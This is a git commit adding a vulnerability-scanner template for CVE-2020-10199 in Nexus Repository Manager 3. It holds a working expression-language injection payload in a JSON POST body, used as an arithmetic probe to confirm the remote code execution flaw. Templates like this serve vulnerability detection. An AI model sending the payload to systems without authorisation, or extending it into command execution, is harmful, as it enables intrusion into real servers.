Create CVE-2020-10199.yaml

2020-07-08 20:41:50 +05:30 · 2020-07-08 20:41:50 +05:30 · 849ac3599d
parent ed4e9e7feb
commit 849ac3599d
1 changed files with 26 additions and 0 deletions
--- a/cves/CVE-2020-10199.yaml
+++ b/cves/CVE-2020-10199.yaml
@ -0,0 +1,26 @@
+id: CVE-2020-10199
+
+info:
+  name: Nexus Repository Manager 3 RCE
+  auhtor: hetroublemakr
+  severity: high
+  # reference: https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
+
+requests:
+  - method: POST
+    path:
+      - '{{BaseURL}}/rest/beta/repositories/go/group'
+      
+    headers:
+      Content-Type: application/json
+    body: '{"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\\c{ 1337 * 1337 }"]}}'
+    
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "1787569"
+        part: body
+      - type: status
+        status:
+          - 400